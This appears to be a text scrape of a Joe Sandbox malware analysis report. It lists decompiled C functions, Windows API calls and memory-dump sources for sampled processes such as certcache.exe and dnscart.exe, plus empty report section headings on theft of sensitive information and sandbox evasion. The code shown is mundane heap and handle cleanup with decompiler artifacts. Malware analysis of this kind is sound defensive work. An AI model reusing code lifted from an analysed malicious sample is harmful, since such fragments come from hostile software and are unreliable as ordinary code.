Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013A7A0, Relevance: 6.0, APIs: 4, Instructions: 31

C-Code - Quality: 100%

			E0013A7A0(long __ecx) {
				int _t3;
				long _t7;
				void* _t9;
				void* _t10;

				_t10 =  *0x13cbd4; // 0x0
				_t7 = __ecx;
				_t9 = 0x13cbd4;
				while(_t10 != 0) {
					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
					if(_t3 == 0x102) {
						_t9 = _t10;
					} else {
						 *_t9 =  *_t10;
						CloseHandle( *(_t10 + 8));
						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
					}
					_t10 =  *_t9;
				}
				return _t3;
			}

0x0013a7a2
0x0013a7a8
0x0013a7ab
0x0013a7b2
0x0013a7b8
0x0013a7c3
0x0013a7e4
0x0013a7c5
0x0013a7c7
0x0013a7cc
0x0013a7dc
0x0013a7dc
0x0013a7e6
0x0013a7e8
0x0013a7ef

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0013A7B8
CloseHandle.KERNEL32(?), ref: 0013A7CC
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00138F95), ref: 0013A7D5
HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0013A7DC

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013961E, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 19

APIs

_snprintf.NTDLL ref: 00139642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 0013964E
HeapFree.KERNEL32(00000000), ref: 00139655

Strings

216554_6C0D37D2, xrefs: 0013963D

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001398EC, Relevance: 6.0, APIs: 4, Instructions: 18

APIs

OpenServiceW.ADVAPI32(?,?,00000001), ref: 0013989D
QueryServiceConfig2W.ADVAPI32 ref: 001398EC
GetProcessHeap.KERNEL32(00000000), ref: 001398FB
HeapFree.KERNEL32(00000000), ref: 00139902
CloseServiceHandle.ADVAPI32 ref: 00139909

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013891E, Relevance: 5.0, APIs: 4, Instructions: 23

C-Code - Quality: 73%

			E0013891E(unsigned char* __eax, long __ebx, void* __edi, void* __esi) {
				long _t10;
				long _t12;
				void* _t14;
				void* _t17;

				L0:
				while(1) {
					L0:
					_t14 = __edi;
					_t12 = __ebx;
					 *__eax =  *__eax >> 1;
					 *__eax =  *__eax;
					VirtualFree( *(__esi + 8), 0, ??);
					CloseHandle( *(__esi + 0x10));
					 *__edi =  *__esi;
					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
					while(1) {
						L4:
						_t17 =  *_t14;
						if(_t17 == 0) {
							break;
						}
						L1:
						_t10 = WaitForSingleObject( *(_t17 + 0x10), _t12);
						if(_t10 == 0x102) {
							L3:
							_t14 = _t17;
						} else {
							L2:
							goto 0x141734;
							asm("int3");
							asm("int3");
							_push( *((intOrPtr*)(_t17 + 8)));
							goto L0;
						}
					}
					L5:
					return _t10;
					L6:
				}
			}

0x0013891e
0x0013891e
0x0013891e
0x0013891e
0x0013891e
0x00138920
0x00138923
0x0013892b
0x00138934
0x0013893f
0x00138948
0x00138952
0x00138952
0x00138952
0x00138956
0x00000000
0x00000000
0x00138904
0x00138908
0x00138913
0x00138950
0x00138950
0x00138915
0x00138915
0x00138915
0x0013891a
0x0013891b
0x0013891c
0x00000000
0x0013891c
0x00138913
0x00138958
0x0013895b
0x00000000
0x0013895b

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00138908
VirtualFree.KERNEL32(?,00000000), ref: 0013892B
CloseHandle.KERNEL32(?), ref: 00138934
GetProcessHeap.KERNEL32(00000000), ref: 00138941
HeapFree.KERNEL32(00000000), ref: 00138948

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00138B2C, Relevance: 5.0, APIs: 4, Instructions: 22

C-Code - Quality: 73%

			E00138B2C(unsigned char* __eax, void* __ebx, void* __edi, void* __esi) {
				long _t10;
				void* _t13;
				void* _t16;

				L0:
				while(1) {
					L0:
					_t13 = __edi;
					 *__eax =  *__eax >> 1;
					 *__eax =  *__eax;
					VirtualFree( *(__esi + 8), 0, ??);
					CloseHandle( *(__esi + 0x10));
					 *__edi =  *__esi;
					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
					while(1) {
						L4:
						_t16 =  *_t13;
						if(_t16 == 0) {
							break;
						}
						L1:
						_t10 = WaitForSingleObject( *(_t16 + 0x10), 0xffffffff);
						if(_t10 == 0x102) {
							L3:
							_t13 = _t16;
						} else {
							L2:
							goto 0x1417f6;
							asm("int3");
							asm("int3");
							_push( *((intOrPtr*)(_t16 + 8)));
							goto L0;
						}
					}
					L5:
					return _t10;
					L6:
				}
			}

0x00138b2c
0x00138b2c
0x00138b2c
0x00138b2c
0x00138b2e
0x00138b31
0x00138b39
0x00138b42
0x00138b4d
0x00138b56
0x00138b60
0x00138b60
0x00138b60
0x00138b64
0x00000000
0x00000000
0x00138b11
0x00138b16
0x00138b21
0x00138b5e
0x00138b5e
0x00138b23
0x00138b23
0x00138b23
0x00138b28
0x00138b29
0x00138b2a
0x00000000
0x00138b2a
0x00138b21
0x00138b66
0x00138b68
0x00000000
0x00138b68

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00138B16
VirtualFree.KERNEL32(?,00000000), ref: 00138B39
CloseHandle.KERNEL32(?), ref: 00138B42
GetProcessHeap.KERNEL32(00000000), ref: 00138B4F
HeapFree.KERNEL32(00000000), ref: 00138B56

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Analysis Process: sppsvc.exe PID: 2868 Parent PID: 448

Executed Functions

Non-executed Functions

Function 00320F77, Relevance: 8.0, Strings: 6, Instructions: 508

Strings

KN,, xrefs: 003212D9
KN,, xrefs: 003210D9
KN,, xrefs: 00321199
KN,, xrefs: 003211D9
KN,, xrefs: 00321258
KN,, xrefs: 00321119

Memory Dump Source

Source File: 00000008.00000002.715405067.000000000031E000.00000004.sdmp, Offset: 0031E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31e000_sppsvc.jbxd

Function 003573C8, Relevance: 4.3, Strings: 1, Instructions: 3054

Strings

,, xrefs: 00357F99

Memory Dump Source

Source File: 00000008.00000002.715472830.000000000034D000.00000004.sdmp, Offset: 0034D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34d000_sppsvc.jbxd

Function 0035551A, Relevance: 2.3, Strings: 1, Instructions: 1063

Strings

,, xrefs: 00355549

Memory Dump Source

Source File: 00000008.00000002.715472830.000000000034D000.00000004.sdmp, Offset: 0034D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34d000_sppsvc.jbxd

Function 003323D8, Relevance: 1.9, Instructions: 1932

Memory Dump Source

Source File: 00000008.00000002.715405067.000000000031E000.00000004.sdmp, Offset: 0031E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31e000_sppsvc.jbxd

Function 0033B2F8, Relevance: 1.0, Instructions: 973

Memory Dump Source

Source File: 00000008.00000002.715405067.000000000031E000.00000004.sdmp, Offset: 0031E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31e000_sppsvc.jbxd

Function 00336D26, Relevance: .9, Instructions: 897

Memory Dump Source

Source File: 00000008.00000002.715405067.000000000031E000.00000004.sdmp, Offset: 0031E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31e000_sppsvc.jbxd

Function 0038D364, Relevance: .9, Instructions: 880

Memory Dump Source

Source File: 00000008.00000002.715543725.0000000000385000.00000004.sdmp, Offset: 00385000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_385000_sppsvc.jbxd

Function 0038D329, Relevance: .9, Instructions: 875

Memory Dump Source

Source File: 00000008.00000002.715543725.0000000000385000.00000004.sdmp, Offset: 00385000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_385000_sppsvc.jbxd

Function 0038D378, Relevance: .8, Instructions: 846

Memory Dump Source

Source File: 00000008.00000002.715543725.0000000000385000.00000004.sdmp, Offset: 00385000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_385000_sppsvc.jbxd

Function 00336D2E, Relevance: .8, Instructions: 838

Memory Dump Source

Source File: 00000008.00000002.715405067.000000000031E000.00000004.sdmp, Offset: 0031E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31e000_sppsvc.jbxd

Function 0038DB60, Relevance: .8, Instructions: 815

Memory Dump Source

Source File: 00000008.00000002.715543725.0000000000385000.00000004.sdmp, Offset: 00385000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_385000_sppsvc.jbxd

Function 00336DC2, Relevance: .8, Instructions: 775

Memory Dump Source

Source File: 00000008.00000002.715405067.000000000031E000.00000004.sdmp, Offset: 0031E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31e000_sppsvc.jbxd

Function 00362D7D, Relevance: .4, Instructions: 352

Memory Dump Source

Source File: 00000008.00000002.715472830.000000000034D000.00000004.sdmp, Offset: 0034D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34d000_sppsvc.jbxd

Function 003A294A, Relevance: .3, Instructions: 304

Memory Dump Source

Source File: 00000008.00000002.715586734.00000000003A1000.00000004.sdmp, Offset: 003A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3a1000_sppsvc.jbxd

Function 0035228A, Relevance: .3, Instructions: 283

Memory Dump Source

Source File: 00000008.00000002.715472830.000000000034D000.00000004.sdmp, Offset: 0034D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34d000_sppsvc.jbxd

Function 003AE838, Relevance: .2, Instructions: 173

Memory Dump Source

Source File: 00000008.00000002.715586734.00000000003A1000.00000004.sdmp, Offset: 003A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3a1000_sppsvc.jbxd

Function 003AE848, Relevance: .2, Instructions: 166

Memory Dump Source

Source File: 00000008.00000002.715586734.00000000003A1000.00000004.sdmp, Offset: 003A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3a1000_sppsvc.jbxd

Function 003520B0, Relevance: .1, Instructions: 140

Memory Dump Source

Source File: 00000008.00000002.715472830.000000000034D000.00000004.sdmp, Offset: 0034D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34d000_sppsvc.jbxd

Function 003AE888, Relevance: .1, Instructions: 140

Memory Dump Source

Source File: 00000008.00000002.715586734.00000000003A1000.00000004.sdmp, Offset: 003A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3a1000_sppsvc.jbxd

Function 0033CB42, Relevance: .1, Instructions: 134

Memory Dump Source

Source File: 00000008.00000002.715405067.000000000031E000.00000004.sdmp, Offset: 0031E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31e000_sppsvc.jbxd

Function 0033C9B2, Relevance: .1, Instructions: 132

Memory Dump Source

Source File: 00000008.00000002.715405067.000000000031E000.00000004.sdmp, Offset: 0031E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31e000_sppsvc.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Signature Overview

Cryptography:

Networking:

Boot Survival:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: dnscart.exe PID: 2264 Parent PID: 2992

General

Analysis Process: dnscart.exe PID: 1844 Parent PID: 2264

General

Analysis Process: certcache.exe PID: 2072 Parent PID: 448

General

Analysis Process: certcache.exe PID: 2280 Parent PID: 2072

General

Analysis Process: mscorsvw.exe PID: 2756 Parent PID: 448

General

Function 001F16D3, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 38
process

Function 001E201B, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 18
string

Function 00A11490, Relevance: 4.6, APIs: 3, Instructions: 80
network

Function 001F2E6A, Relevance: 1.8, Strings: 1, Instructions: 509
Crypto

Function 001F9CB8, Relevance: 36.2, APIs: 24, Instructions: 176
library

Function 001F8E20, Relevance: 21.2, APIs: 14, Instructions: 155
string

Function 001FA658, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 42
processfile

Function 001FA6E0, Relevance: 15.1, APIs: 10, Instructions: 65
thread

Function 001FA515, Relevance: 15.0, APIs: 10, Instructions: 50
file

Function 001F9569, Relevance: 10.5, APIs: 7, Instructions: 31
file

Function 001F9990, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
process